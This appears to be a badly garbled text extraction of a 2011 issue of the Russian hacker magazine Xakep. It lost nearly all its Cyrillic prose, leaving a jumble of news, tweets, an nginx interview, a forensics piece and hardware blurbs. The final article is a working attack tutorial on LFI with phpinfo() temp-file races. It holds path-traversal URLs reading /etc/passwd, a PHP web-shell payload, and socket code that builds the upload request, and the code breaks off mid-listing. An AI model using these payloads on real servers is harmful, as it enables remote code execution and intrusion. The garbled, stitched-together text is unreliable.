Вы находитесь на странице: 1из 148

030

x 12 (155) 2011

IPv6,

NAT'

WWW.XAKEP.RU

12 (155) 2011

LFI /TMP/ PHPINFO()

: 210 .

024

NGINX
102

++11:

074


FIREFOX

155



-


PC_ZONE UNITS

MALWARE SYN/ACK
UNIXOID

PR-
xakep.ru

nikitozz (nikitoz@real.xakep.ru)
step (step@real.xakep.ru)
gorl (gorlum@real.xakep.ru)

step (step@real.xakep.ru)
(magg@real.xakep.ru)
Dr. Klouniz (alexander@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
gorl (gorlum@real.xakep.ru)
(grigorieva@glc.ru)
(xa@real.xakep.ru)

DVD

Unix-
Security-

ant (ant@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
D1g1 (evdokimovds@gmail.com)

ART
-

(naumkin@glc.ru)

PUBLISHING
, 115280, ,
. ,19, , 5 , 21. .: (495) 935-7034, : (495) 545-0906


.: (495) 935-7034, : (495) 545-0906

, ,
. ,
,
,
, , ,
.
, : ,
.
, . Eset , ,
. Group-IB
-.
, web- !
(),
: C
web-. ,
web- .
,
. , .
.
, !
. ,
,
.


TECHNOLOGY

(komleva@glc.ru)
(olgaeml@glc.ru)
(alekhina@glc.ru)

(polikarpova@glc.ru)

(birarova@glc.ru)
( )
(tatarenkova@glc.ru)

(yakovleva.s@glc.ru)
-
(alekseeva@glc.ru)

(kosheleva@glc.ru)
(lepikova@glc.ru)
(lukicheva@glc.ru)

:
DVD-: claim@glc.ru.

: (495) 545-09-06
: (495) 663-82-77
: 8-800-200-3-999
: 101000, , , / 652,
,
77-11802 14.02.2002
, . 219 833 .
.
. ,
, . .
. : content@glc.ru.
, , 2011

nikitozz, . .
vkontakte.ru/xakep_mag
facebook.com/XakepMagazine

12/155/ 2011

001

HEADER

COVERSTORY

004

020

016
017
018

MEGANEWS


,
hacker tweets
-
Proof-of-concept

024
030

036

PCZONE
042
046
050

Git&GitHub:
5

Clickjacking: , ,
IPv6:
IPv6- ?

054
060
064
068

074
078
082

Easy-Hack



!
demotivators.ru XSS



Firefox

: AdSense

X-Tools

097
102
106

110

088

094


PoC

114
120


OpenBSD 5.0 FreeBSD 9.0

kernel.org, linux.com,
inuxfoundation.org mysql.com

SYN/ACK
124
130

FERRUM
134

136

Quadratisch. Praktisch. Gut



GIGABYTE GA-H61N-USB3
,
Edifier MP250

137

Content

PHP
PHP-

C++11: C++

,

UNIXOID

MALWARE
084


, !
[ engine x ]


,

phpinfo
LFI-
PHP

140
144

8.5
FAQ UNITED
FAQ

+ Bluetooth = SMS

MEGANEWS
SONY

-

15

blekko. blekko
30
.

WP7

IOS ANDROID

Sony

100
PlayStation Network,



.
Sony
Music

8500 .

, ,
Sony. Sony
(,
GeoHot ),
,
. , ,
, 7 10
PlayStation Network, Sony Entertainment Network Sony Online
Entertainment. 60
PSN/SEN 33 SOE. ,
,
- .
.
Sony, 0,1 % .
93 ,
, .
, .
, Sony , . , . :)

MICROSOFT
SECURITY ESSENTIALS

PWS:Win32/Zbot Google
Chrome.
. ,
:).

004

,

. ,
121 .


,
,

. 9 % .


,
iOS Android . -

,
. Apple Google , ,
,
. ,
. , Microsoft
. ,
Windows Phone 7
,
Wi-Fi
,
.

.
Microsoft ,
, .
,
, WP 7.5.



.


Facebook.

ICQ MAIL.RU

Mail.ru
. ,
.

12 /155/ 2011

MEGANEWS

GOOGLE : Google Buzz, Google Labs, Google Code Search Jaiku.

EDIFIER

MICROSOFT -
Microsoft,
,
. ,
Waledac,
Rustock.
Microsoft Kelihos ( Hlux)
4245 .
Kelihos
- . , , DDoS-,
.
Microsoft . Microsoft ,
.
Kelihos 2011 ,
.
-, ,

.
sinkhole-
, . .
: . sinkholing

.
. Microsoft
, .
.

VeriSign.
, . ,
? , sinkholing
, -
. , ,
, , ,
.

Edifier

MP17


:
235 67 40 .
-

.

Edifier AudioCandy 2
(MP17) . . , USB- FM-,
, SD
,
( USB-). 17 .
2,4 RMS!
, . Edifier MP17
AUX.
,
FM-. 1300 . Edifier MP17
.

,
IPHONE 4S
.
, GPS .
, .
006

12 /155/ 2011

07

MEGANEWS

, DRM .

?
, !


Vigilant Defender.
Vigilant Defender , -
Deus Ex: Human Revolution .
, ,
. ,
, ,
.
. , , . , 24 %
, , 25 % ,
.
, ,
. , , ,
$3040 ( ,
Deus Ex: Human Revolution $60).
,
DRM .

eBay!

, ,
.
.
eBay
20. ,
(NATS). , .
,
. ,
,
.
,
.
.
NATS ,
,
. ,
.

-, .

WEXLER.BOOK E6002. WEXLER


WEXLER.BOOK E6002,
E6001. 6.0 PEARL,

.
4 , SD-
36 .
, .
-
1500 mAh, WEXLER.BOOK E6002

.
5 990 .

008


900

. Deus
Ex: Human Revolution

.

, PAYPAL
.
, . , . PayPal
,
,
2,4 3,4 % .

.

12 /155/ 2011

12 /155/ 2011

09

MEGANEWS

FACEBOOK . .

RIW-2011
,

:
RIW
-.

, . ,
ESET,
. ,
,
.

, ,
Group-IB .
2011
. , , , Digital Security.
-

,
.

, CEO- Hint Solutions.
-

WikiLeaks.
. ,
Positive Technologies
, -


.
RIW-2011.
,
, RIW 2011 .
,
.
- RIW-2011,
: . !

- RIW 2011,
:
, ,
,
,
,
,
.

HEADHANTER.RU IT-

71 %
-
, 18 %
, 8 % .
010

12 /155/ 2011

BUFFALO MINISTATION PLUS


1

7

Buffalo's Backup Utility

Windows. ,
Time Machine,

MAC OS X.

Buffalo MiniStation
Plus
1
.
,
.

USB
,
: ,
, .
:

USB.

RAMDISK

TurboPC
TurboCopy


USB 3.0

.

12 /155/ 2011

USB 3.0

Buffalo MiniStation Plus


eco
Manager,
.
:


.


AES
256 .



SecureLockMobile.

RAMDISK Buffalo



. ,
,

.


.

011

THE WALL STREET JOURNAL, Photobucket .

MEGANEWS





,



.

, , , . ,
Predator Reaper,
. , , , ,
.
, .

. ,
,
. , , . ,
,
- . , ,
,
- Mafia Wars :).


, 27 100 Chrome
.
50
50 .

012

Belgacom
Telenet
11 ,
The Pirate Bay.

3D-
,

3D- (

) .
. ,
,
. Roland DG, ,
3D- iModela
$977 ( 3D- ). ,
, , ,
, , ,
. . ,
, , ,
.
, , ,
.

RUNA CAPITAL 3
- NGINX,
. 43
.

LibreOffice

Apple
iOS Google Android.

12 /155/ 2011

() LTE.

C3PO-r2d2-POE
.

. :)

Chaos
Computer Club ()
. , ,
-. , , , ,
.

. ,
, , ,
.
,
,
. , CCC, ,
.

IE 9

-
, Microsoft.

92% URL-
8% .

12 /155/ 2011

PHOTOSHOP
deblurring

. !
:).




1,5%
78,5%,

.


, , .
,
,
. , ? ! .
20-
.
BSL ( 82 84 ) Lineage 2.
BSL, ,
. , ,
,
.
, , , .
,

.
,
, .
,
, . ,
. -, ,
- ...

FACEBOOK .

. ACE,
Webscense.
, ,
, .

013

MEGANEWS

9TO5MAC , IPAD 2 Smart Cover.

SPYEYE

DART

GOOGLE

SpyEye
SMS


,


.

Trusteer ,
SpyEye . ,
:
SMS ,
- . MitB-
, -,
, . ,
- , ,
. :
SpyEye
.
,
, .
,
, . ,

, SIM-.
, ,
.


GPS- . ,

5%- .
014

Google

,

Dart (dartlang.
org).

,
, -
. JavaScript. , Dart
JavaScript,
.
, , BSD. Dart
. ,
.
, Web Inspector
Dart Harmony -. ,
Dart ,

,
.
, Dart
JavaScript.
Dart
Dart. Google
Dart Chrome, ,
Google Chrome OS.

:
, .
,

.
,
.
. Dart
, , .
.
, Dart
Google. 2006 Google Web Toolkit, - Java.
, , Adwords Google Wave.
Google Web Toolkit .

Dart, Google...
Dart , , . Dart

, , Google
.

12 /155/ 2011

EUROPEAN ATM SECURITY TEAM , , , 33 %.


CHROME
GOOGLE
,

, Google ,

.
, , Chrome. , Chrome
Remote Desktop, -.
Windows, Mac OS Linux,
Chrome-. Chrome Remote Desktop
- Chrome.
IT-, , .
(
) .
- , .
Google , -,
, .
, Google hrome , -.
WebRTC (Real Time
Communications),
- . Google , WebRTC
-
, . ,
. , WebRTC
Opera Mozilla. ,
Google Mozilla Opera,

.
, WebRTC. Google
, Chrome.
, WebRTC ,
: iSAC iLBC
, Google
V8. chromium.org ,

PARKER INGENUITY

,



12 /155/ 2011

, Google eamViewer

P2P-
libjingle, UDP TCP
Google.
PseudoTcp libjingle,
. SSL-.
protobuf (Protocol Buffers).

PARKER 5TH TECHNOLOGY


PARKER
, .
Parker 5TH Technology ,

,
.

,
, ,

.

,


. Parker
Ingenuity
Parker 5TH Technology;
,

. Parker
Ingenuity :

, .
,

,

.

015

HEADER

,

?
, ,
,
. .
- -,
Loggly, Splunk - .
. ,
,
syslog/syslog-ng, . ,
-,
. -. -, . -,
. , , :
- - .
standalone- Loggly, ,
Graylog (www.graylog2.org/about),
,
MongoBD . ,
Logreplica (dklab.ru/
lib/dklab_logreplica). , .

?
: Logreplica
SSH ,
. , ,
,
, ,
.
.
. :
syslog/syslog-ng?, Logreplica
. ,
.

# ,
destination = /var/log/cluster
# ( )
skip_destination_prefixes = /var/log:/var/lib/pgsql/data/logs
#
scoreboard = /var/run/dklab_logreplica.scoreboard
delay = 0.25
#
user = root
# -,
#
[files]
/var/log/{messages,maillog}
/var/log/httpd/*_log
# ,
[hosts]
first=machine1.example.com
second=nobody@machine2.example.com

. - dklab_logreplica.
init /etc/init.d . /etc/init.d/dklab_logreplica start,
logreplica .

?

, (www.denwer.ru),
PHP ( logreplica
Perl). z

?
, -
(
).
-, .
, (
ssh-keygen -t rsa) ,
(ssh-copy-id root@machine-to-be-pulled). Logreplica
(/etc/dklab_logreplica.conf),
, -,
:

016

Logreplica GitHub

12 /155/ 2011

(@asintsov)

00000000

#hacker tweets
@FishermansEnemy:

@jmj:

CISSP,
Metasploit.

Facebook,


. .

@StackSmashing:
@DidierStevens:

free(pDennisRitchie);
pDennisRitchie = NULL; // :-(

-2147483647

Integer.

.
,
,
Lisp .

@XakepRU:


: live.
xakep.ru/blog/Hack/2147.html.
:

@0x6D6172696F:

.
.
bit.ly/rIbsue.
:

,
,

Chrome,
(
Google).
cross-origin policy!
, ,
, ;).

@yandex:


:
$5000

.
, web-
. ,


.

@stamparm:

Google
'"</title><script src" urchin.js'

, (!) ASP(.
NET)/MSSQL SQLi #fact
:

-. , , SQLi. ,

:).

@0xcharlie:

,
NMFB, ,
Syscan Infiltrate. ,
= .
:

NMFB NoMoreFreeBugs
. ,
.

.

@mikko:

, ,

IE6 F-Secure? :
W32/IE6.a, ...

@samikoivu:

2008

Java. Java,
.

@ConanOBrien:

,
, .
Angry Birds, Angry
Birds Rio Angry Birds Seasons.

@VUPEN:


. ,
, .

@BreakiingNews:

75%
: 1 2 3 4 5 6 7 8 9 10 11
12 13 14 15 - ,
...

MS Windows 0-Day, Duqu TrueType. T2EMBED.DLL bit.ly/sqYUgo


:

@0xcharlie:

,
:
Secunia
.
... #nomorefreebugs

12 /155/ 2011

@BillGates:

, ,
.
.

, ... , StuxNet 0-day


...
- !

017

HEADER

Proof-of-Concept

,
.
,
.
PoC
.
, ,
Tcpcrypt (tcpcrypt.org), TCP
.

?
. Tcpcrypt
. ,
:
.

- ,
. Tcpcrypt TCP.

, .
.
Tcpcrypt,
, ,
.

?
(github.com/
sorbo/tcpcrypt), . ,

(Windows, Mac
OS X, Linux, FreeBSD).
:
(4500 ) userland (7000 LoC).


,
netsf.inf. , , Tcpcrypt.
nix-
: ,

tcpcrypt : -
, TCP

018

.
.

?
79%
Tcpcrypt :). ,
.
(Internet
Draft), ,
( : bit.
ly/tyvGxs). ,

,
?
( ,
NAT), ,
. ,
Tcpcrypt
- (
VPN-). , (
36 SSL).
, .
Tcpcrypt? ,

MITM-. z

SSL 82 TCP.
tcpcrypt TCP !

12 /155/ 2011

!
GROUP-IB,
,
.
GROUP-IB.
Group-IB
,
. ,
.

NUX
I
L


:



:



11
20

3
:


Group-IB . .


. .

2 2011

()




,
,

.


USB Flash,


,


dd (raw).
,



,
,
,
.



11

3 20

x.
nu
Li


1.



?
,
?

2.

?
?


:


?

,

?



?


?



.
.

contest@group-ib.ru

.

DVD

!
!

COVER STORY

, , Group-IB


, !
, DDoS,
,

-
.
,






. ,
.


,
,
,

.

,
,
, ,

.

, ,

.

()
. ,
,


,
.

,

, ,
. .
1)
, . , ,
. ,

020

, ,
.
2)
,
,
.

.
3)

. , DLP
. DLP-
.
.
4)
,
-. ,

.



.
,
, ,
.
1) , , , :
,
.
.

.

, ,
( , IPS,
DLP), ,

12 /155/ 2011



IP- 8.8.8.8,
,
1 25 2011

.
2241 19
2000 .


() . .
Caine - Computer Aided INvestigative Environment


.
-,
.
,
.

.
2) , , ,
:
, ,
, ,
,
.


,
.
,
.

.


Linux:
Caine (http://www.caine-live.net/),
RipLinux (http://rip.7bf.de/current/).
, CD\DVD
USB-, .

livecd ,

.
.

- , ,

. ( )
DC3DD. (
)
Access Data FTK Imager (http://
accessdata.com/support/adownloads),
. ,
,

.
-

( , ) ,
.
,
.







,
.

12 /155/ 2011



,
,
,

.


,

.

. ,

.
,
,
. ,
, :
, ;

021

COVER STORY
,
;
(, );
, .
:
,
. .,
12345.

(), DVD, USB-,
SDHC.
Seagate, 3750330NS,
AAABBB123.
\Users\\Documents\ 1 8

.txt.
QIP 2010,
6221, ,

.
, :
(, , );
(, );
;
,
.

, , Group-IB

,
:

\COMP1\HDD1\IE USB-, ADATA, 1234.
, :

;
, -,
- . ;
, ,

.
!

:
.doc,
653 .
MicroSDHC,
Transcend, 16 ,
1234 567.
-
Internet Explorer .



,

.

(, -),
, , ,
,
.

,
:
, DLP
, .

DLP, ,
.
.
.

, , .

,
,
,
.
RIP Linux

022

12 /155/ 2011

: DDOS
,
:
, -
- .
-.
- ,
.
-
(), ,
.



,
510
.
.

,
.
.
. ,
, .

,

, ,
:),
.
,
:
1)
.
2)
.
3) ,
. z



SONY , ,


12 /155/ 2011

Access Data FTK Imager

:
,
:
,
,
, , ( ).
.


.
( ),
, .

,
,
,
.

023

COVER
STORY

&&&&&

[engine x

024

12 /155/ 2011

nginx

, ,
,

?


. ,
( ) -,
18 . 1987
,
,
-,

.
-226,
- .

, -86,
,
.

:
, Yamaha
( MSX). , , I.
, - .


NGINX


,
?


AV,
19891990 .
,
- 100 .
,
,
: ,
, ,
. ,
.
,
. :
,
. -
, 1992-
, .
1994 ,
,
.
7 ,
2000 .
NASDAQ, -,

. -
XXL.RU, ,
,
13 2000

.

.
1994

, .
,

200 0
, .

11
2002
nginx,
web-

. 45

.

2011 $3.000.000
Nginx , inc. .

12 /155/ 2011

025
025

COVER STORY
Q

.


. ,
,
, ,
,
Apache. , mod_gzip
,
mod_deflate, Apache 1.3.
mod_proxy. ,
,
- .
mod_accel
Apache .
2001 .


,
?

, . Mod_deflate
,
, .
, , ,
. 2001

-, Apache.
,
, .

, , ,
, , .

Apache , .
:
Apache
, .
nginx Apache
. , ,
nginx .
Apache: ,
,
. ,
- ,
.
- , , :
, ?
nginx . ,
- 2002 nginx.



? ?

2003
, , , nginx
.

026

Rate.ee,
. , ,
. nginx
mamba.ru zvuki.ru,
MP3.
2004
foto.rambler.ru, , , nginx
,
.
, , ,
, , . ,
, . - 2004
, foto.rambler.ru
nginx.
4 2004 ,
, : 0.1.0.
NGINX
,
?


.
. nginx
. nginx
,
.
, , nginx,

, , .
,
.
.

,
, ,
?


. ,
.
, nginx
,
,
, . nginx, ,
. -,
,

, -,
.

, LIGHTTPD
, .

-,
nginx
. nginx

. ,
nginx
nginx. , nginx
-.
lighttpd (lighty). -
, nginx, .
(Jan Kneschke).
,
, , .
, ,
.
, lighttpd
FastCGI. 20002001
, , Apache: PHP, Perl, Python.
lighttpd
PHP- , FastCGI.
lighttpd FastCGI . 2000 :
, FastCGI?
mod_php, .

NGINX ?


. nginx
-
- HTTP FastCGI
WSGI.
Apache , nginx
,
FastCGI.
, ,
nginx, Apache.
:
nginx , .

,
?

, ,
Apache nginx? ,
, . Apache
,
- , ,
mod_php. ,
PHP 100
, ,
, 100 .
: 10
,
, -
.
100
, , 80 / (10 /).
, 10
. ,

12 /155/ 2011

nginx

, Apache PHP
1020 .
, , Apache
, ,
.
,
. nginx
Apache, :
nginx
, Apache,
,
.
nginx ,
- ,
,
(
Apache,

. . .).
- , ,
nginx

nginx
,
.

,
,
, - .
Apache, nginx
! .
, ,
, .
, -,
,
. , nginx
.


, , ,
. ?
, , :
- Apache . ,
nginx, Apache.

FastCGI PHP WSGI Python.
, WordPress.com nginx
, -
LiteSpeed.
nginx,
PHP FastCGI.
nginx ,
, MP3, FLV-, MPEG4-, .


.
NGINX -
?

12 /155/ 2011

, ,

, .
,
.
, ?
- ,
. ,
. ,
, ,
. ,
- Debian/Ubuntu,
,
, ,

. ?

, , .

ALSR?

, . .
, . , ,
, ,
, , .
nginx ,
, , .
, ,
. ,
, nginx ,
malloc.
, -
,
. nginx . ,
, . , ,
, .
Security-advisory ,
. ,
, . ,
, ,
? ,
- .


Q
, ?
, .

.
.

. :
, .
. .

,
. :

, -

,
, . , ,
,
. ,
, . :
nginx , ,
,
. ,
.
,
NGINX,
INC. ,
.

. , ,
2008-
, , .
,
. -
nginx, . ,
.
, -
,
,
. ,
,
nginx. ,
: ,
,
.
- . ,
, - ,
.

, Parallels Runa
Capital.
, .


, ?

,

, .

,
, ,
, .
, , ,
, , -,
,
, ,
- , . ,
, :
-, -. . ,
, .

027
027

COVER STORY
:
NGINX.
?
.
?

, . ,
, ,
.
,
,

.
, : .
, ,
BSD,
.
nginx ,
.
, nginx
, Rate.ee zvuki.ru.


NGINX?

A ,
. , .
,
, ,
, .
.
Linux-:
CentOS, Ubuntu.
, , .
: ,
, ,
.

.

.
,

,
.
,
, ,
, ,
. ,

.
,
, :).

,
,
, ?

028

, ,
, ,
, ,
: .
, ,
.

,
! , -
:
-
.

, , .
- ,
.
-, :
, , .

! ,

- -?

?

nginx
.
-, , ,

,
-, ,
-
. , nginx
, ,
.
, : , ,
. ,

.
opensource-,
,
- , - ,
, .

, opensource. ,
, . ,
,
.
,
.
,
. ,
opensource-
.

, , ,
, ,
,
nginx.
. ,
- : ,
! - -.
?
,
,
. . .
,
. , , ,
-
, - ,
.
, : ,
. ,
open source, ,
/ . sponsored development.
,
nginx: ,

, , , , CDN-.

.
, ,
, ?

, ,

.
,
, ,

.
, .
,
,
, .

,
,
, ,
?

, ,
, ,
,
- . ,


,
- .
,
. . z

12 /155/ 2011

nginx
- nginx,
. , ,
, -, .



nginx.

Nginx

.



HTTP keep-alive
.

-
(Netcraft, 2011):

-
nginx

100
000 000

80 000
000

43 000
000

-0.38%


,
nginx

-.

-0.07%

+0.51%

2002

2004

2011

1.0
nginx

2011 nginx



:
.

12 /155/ 2011

Rate.ee
,

nginx.

nginx
:

$3

nginx

87 912
.

70+

.
nginx hiring!

8
nginx

security advisories.
3
nginx

029

COVER STORY

R_T_T

,

.
,
. ,
,
,
.

030

12 /155/ 2011


,

Intel
( 2007 )

,

SMP-.
,
, ,

1. AMD

12 /155/ 2011

,
.
,
, .
,

. , ,

,
, .

, ,
.

,
.



.


( 4060 ),
- , ,
.

,


,
( , Intel
). .
, ,
, .
, , -
, .
,

,

.
,
,
.
,

, .
,

.
, ,
- .
,

, , .
,
Intel

.
-

031
031

COVER STORY
86.
,

,

.

.
, - , , - .
,
,
- .
,
.
,

, ( )
.
, , ,
.
, ,
,
Intel
,

:
, , -
,
,
Intel. , -
? : Assembled
Canada, Assembled China.
, -

2. Intel

032

,
,
. , ,
, ,

.
:

, .
,
, , ,
, .
, Intel
. ,
5000, . ,
631xESB/632xESB I/O Controller Hub,
- , 2007

. ,
. ,

-:
,
,

.
()
.
, - ,


.
, , , -
, , ,

, : , .
Intel ,
,
( IPMI,
)
,
.
, - ,

, .
.
,
:
ARC4 processor working at 62.5 MHz speed.
Interface to both LAN ports of Intel
631xESB/632xESB I/O Controller Hub allowing
direct connection to the net and access to all LAN
registers.
Cryptographic module, supporting AES and
RC4 encryption algorithms and SHA1 and MD5
authentication algorithms.
Secured mechanism for loadable Regulated FW.

40
, ! Intel
256 .
,
,
.
,
Intel, 5000,
. , , ,
(
,
).
,
, -
,

,
.

, ,
-
, .
,

.

12 /155/ 2011


, Intel

,

.


.
:
Intel
5000 , - ,


.
-
Intel ,
,
.
- ,
-
, , , , ,

.
-

Intel,
, . ,
.
, ,
, ,
.

,
?
,

. ,

,

60 , .
, , ,

, . , ,
,
- IP-.
? , -
,

, -

12 /155/ 2011

.3

.
, ,
, ,
,
.

.
Intel AMD ,
, ,
. ,
, .
.

,
,

.
,
.

VMCB (VMCS), ,
0,40,7 .

Intel ,

,
.
.
Intel AMD
.

. AMD , .

AMD
VMRUN ( , ).

VMCB- AMD
,

VMRUN VMCB- .
,
AMD .
Intel
. VMCB- VMREAD VMLOAD,
.
,
VMCB-,
.
, , .
,
,
. , ,
. Intel
, , ,

VMCB (. 2).
,
SMM- ( ),
, , VMB-,
,
,
,
.

, Intel, ,
, ,
. ,
,

.
: , -
.

033
033

COVER STORY

,

. .
,
. , -
.
,

,

. , : ,

.
,
.
, Intel
.
,
, 7,
11- ,

( - ). , 11

, VMCB-
.

,
.
11-
,
,
, .

, ,
-

.
, , , 11-
.
,
!
, -
,

,
.
, . , ,
,
-
.


- , ,
.
,


.
, ,

Intel, , ,
, .
- .
, . , ,
.


-,
.

, .

. ,

, , .
,
.

USB-, ,
,
.

(. 3).
, ,
,
.


(. . 4).
- ,
Intel, ,
.
. Intel. ,

.
,
, .


.
. , ,
Intel , .
, ,

.
, ,
.

. 4.

034
03
0
3
34

12
2 /155/
/1
155
15
155/
55/
5
5/ 20
2
201
2011
01
0
11

.
,
.

, .
, , ,

,
. ,
,
,
.
,
, ,
.
, ,
. ,
. .
,


, .

, ,
, ,
,
.
, , ,
,
.
,
,
. ,
,
.
,
. ,
,
.
, , ,
, ,
.
,
-
, ,
-?
,

?

12
12 //155/
155// 201
155/
155
15
2
20
2011
01
0
11

,
, .

, .

,
( , ). ,
,
, ,
. 86, , ,
. , ,

, .
, ,
.
.
,
:
. - ,
.

-, -,
,
.

,
. ,
,
.
-
,
. ,

,
, , ,

,

, .

, ,
.
, : /
.
/
.
!
20

.
:
.


DOC-
.
,


,
.
,
( ,
) .
. ,
,
,

.
,
.

.

.

,
, .
, ,
. , ,
, .
,
, , .
, ,

.
, ,
, -

. ?
. ,
. ,
, , ,
, .
,

.

,
.
, , ,
. ,
, -. , , , , ,
.
, . ,
, , , ,
, . z

035
35
5

000, 00spersky Lab


poma (pomawke@gmail.com)

COVER STORY

phpinfo
LFI-
PHP



LFI
phpinfo()
.
.

WWW
php.net

PHP;
bit.ly/neygaA
LFI;
bit.ly/ccFHcY
phpinfo() ;
bit.ly/pmkMVP
LFI phpinfo()
RDot;
bit.ly/YP9LE
BWMeter;
bit.ly/eS4GxW
Procmon.

WARNING

. ,



,

036

INFO

DVD

phpinfo()


10% .






PERL PHP,

.

, ,
local file include, ,
. . , .
,
, . LFI,
.
. -: , - local file inclusion...
php.ini - , ?
, - , ! LFI- ,
,
.



LFI:
1. (, , . .).
(,
).
2. (/apache/logs/error.log, /var/log/access_log, /proc/
self/environ, /proc/self/cmdline, /proc/self/fd/X ).
, ,
. PHP CGI
/proc, .
3. (data:, php://input, php://filter),
allow_url_include=On ( Off) PHP >= 5.2.
4. (/tmp/sess_*, /var/lib/php/session/). ,
.
5. . CMS www-,
( , /var/spool/
mail).

12 /155/ 2011

phpinfo

tmp-

, LFI
(/tmp/php*, C:\tmp\php*). /
:
LFI-;
phpinfo();
- Windows (
);
PHP > 5.2.0.

( , - ,
):
1. PHP- php- phpinfo(), PHP (tmp) .
2. phpinfo()
seed ( ) .
3.
(, Content-Length),
.
4. tmp- LFI.

PHP- tmp-

PHPINFO()
phpinfo().
, php.ini
, .
:
1. upload_tmp_dir , PHP . (NULL),
Environment.TEMP.
2. file_uploads
upload_tmp_dir (
On).
3. upload_max_filesize .
(
10 ), 2 .
4. max_execution_time .
0, ,
, . :-)
5. session.serialize_handler . php
( ).
, phpinfo()
PHP, PHP Version 5.3.8.

PHP $_FILES


. . , :

(
RFC1867):
1. .
2. - PHP.
3. PHP tmp- .
4. .
6. PHP- .
7. PHP -.
8. PHP cleanup ( ) .
9. - , .

http://site.com/css.php?file=style.css
http://site.com/css.php?file=../../(..)/etc/passwd

, css.php:
<?php
// {..} - ,
// {..}
if (!isset($_GET['file']) OR
!file_exists('./tpl/default/'.$_GET['file']))
die('404 Not Found');
// {..} , -
//
include './tpl/default/'.$_GET['file'];
?>

, ,
,
. *nix Windows:
http://site.com/css.php?file=../../../../../etc/passwd
http://site.com/css.php?file=../../../../../tmp/
http://site.com/css.php?file=../../../../..\Windows\Temp\

12 /155/ 2011

3, 4, 5, 6, 7 tmp- ,
8 . PHP-

$_FILES,
move_uploaded_file(). ,
PHP
, ,
. , PHP
, cleanup.
, ,
, ,
. ,
PHP- ( ob_* ob_start, ob_flush ), , 8 9,
.

037

COVER STORY
DOS LFI + PHPINFO()
_FILES, ,
. .
, - ?
? .
. ,

30
, ,
. ,
.
(
+ ).

. ,
. .
DoS-
file_upload php.ini.

,
. phpinfo(),
tmp- , ,
LFI , PHP cleanup.
, , .
, PHP ?

PHP
,
LFI , PHP. PHP
! , . , . , , .
, . :) :
Content-Length (
);
(,
------------8WvJNM).
, :
1. .
2. ( ).
3. ,
.
2 ,
PHP . , , ,
, ,
.

TMP-
,
.
phpinfo() .
(phpinfo.php, info.php, i.php . .), Grey eLwaux
( ). ,
. . PHP Variables phpinfo()

038


PHPINFO()
PHP- phpinfo()
, .
,
.
, ,
phpinfo():

1. , / PHP, ;
2. document_root ,
;
3. error_log ( LFI);
4. safe_mode (default OFF) ;
5. open_basedir (default empty) ,
PHP;
6. allow_url_fopen (default ON) URL
;
7. allow_url_include (default OFF) ;
8. magic_quotes_gpc (default OFF)
;
9. register_globals (default OFF) ;
10. disable_functions (default empty)
;
11. max_execution_time (default 0)
;
12. display_errors (default OFF) ;
13. upload_tmp_dir tmp-.
14. (curl, sockets, zip . .);
15. : _GET, _POST, _COOKIE,
_FILES, _SERVER.

: _GET, _POST _FILES. PHP (<=5.1) phpinfo()


_FILES,
Array. ()
.
, phpinfo() ,
HTML-,
PHP Variables:
<form action="http://site.com/phpinfo.php"
enctype="multipart/form-data" method="POST">
<input type="file" name="aa" />
<input type="submit" />
</form>


GET- : http://site.com/
phpinfo.php?a[]=111. PHP _FILES _GET ( ,
var_dump). , ,
tmp-. tmp-
upload_tmp_dir php.ini. *nix /tmp, C:\Windows\Temp. 99 % PHP
. (bit.ly/
raWpwS), Windows , PHP
GetTempFileName,
:

12 /155/ 2011

phpinfo

(!) .
<path>\<pre><uuuu>.TMP
--<path> = C:\Windows\Temp ( upload_tmp_dir
php.ini),
<pre> = php (session.serialize_handler),
<uuuu> = .

, Windows <uuuu>
, :
php1A3E.tmp
php1A3F.tmp
php1A40.tmp

*nix
mkstemp (linux.die.net/man/3/mkstemp):
<path>/<pre><rand>
<path> = /tmp,
<pre> = php (session.serialize_handler),
<rand> = (seed += XXX ^ PID)
XXX glibc
:
- XXX = time()
- XXX = gettimeofday().sec << 32 | gettimeofday().usec
- XXX = rdtsc

, ,
: /tmp/phpXXXXXX, XXXXXX
[A-Za-z0-9]:
/tmp/php6Dekf9
/tmp/phpK1uuk5
/tmp/phpdnJ82P

, *nix Windows
. , -

WINDOWS
,
:
1. phpinfo().
2. , phpinfo()
_FILES[tmp_name] .
3. phpinfo()
<?php
assert(stripslashes($_REQUEST["e"]));
?>

, Content-Length
. .
4. ,
, (. 1) (
LFI).
5. tmp-, .
6. 2- , .
, phpinfo() win-
. phpinfo() ,
. Windows 61440 .


*nix- :
1. phpinfo() HTTP- c PHP-
.
2. -
- (, BWMeter),
.
3. , phpinfo().
4. ! [tmp_name] - ( ,
), /
.
phpinfo() - ,
,
.
phpinfo.php
, ,
,
:
http://site.com/css.php?file=../../htdocs/public_html/
phpinfo.php

PHP,

12 /155/ 2011

URL POST- , PHP-

039

COVER STORY
, . ,
, , PHP-.
, phpinfo() ,
.
1000000*36 ,
.

. ,
Microsoft-IIS/7.5 PHP/5.3.8.
Windows- css.php LFI:
<?php
$file = './uploads/'.$_GET['f'];
if ( file_exists($file) ) {include $file; die; }
die('File not found!');
?>


phpinfo.php:
<?php
phpinfo();
?>

, tmp-:
<?php
assert(stripslashes($_REQUEST["e"]));
?>

PHP- POST-
PHP-:
// Evil
$file="-----------------------------XaXbXaXbXaXbXa\r\n";
$file.="Content-Disposition: form-data; name=file".rand(0,100).";
filename=\r\nfile".rand(0,100).".txt\r\n";
$file.="Content-Type: text/plain\r\n\r\n";
$file.="<?php assert(stripslashes(\$_REQUEST[\"e\"]));?>\r\n";
$file.="-----------------------------XaXbXaXbXaXbXa\r\n";
$post = $file;
$req ="POST ".$target." HTTP/1.0\r\n";
$req.="Host: ".$host."\r\n";
$req.="Content-Type: multipart/form-data;
boundary=---------------------------XaXbXaXbXaXbXa\r\n";
$req.="Content-Length: ".strlen($post)."\r\n";
$req.="Connection: Close\r\n\r\n";
$req.= $post;

:
$tmp = '';
$html = '';
$sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
socket_connect($sock, $host, 80);
socket_write($sock, $req);
while ($out = socket_read($sock, 65536))
{
$html .= $out;
if(preg_match_all('#=&gt;(.*)#',$html,$r) &&
!empty($r[0][2]))
{

040

$tmp = str_replace(array("=&gt;",' '), '', $r[0][2]);


}
}
socket_close($sock);

$html phpinfo, $tmp


tmp-. <uuuu>:
$tmp_hex = $tmp;
if(strpos($tmp_hex,':')) {
$path = explode(':',$tmp_hex);
$tmp_hex = $path[1]; }
$tmp_hex = ($tmp_hex &&
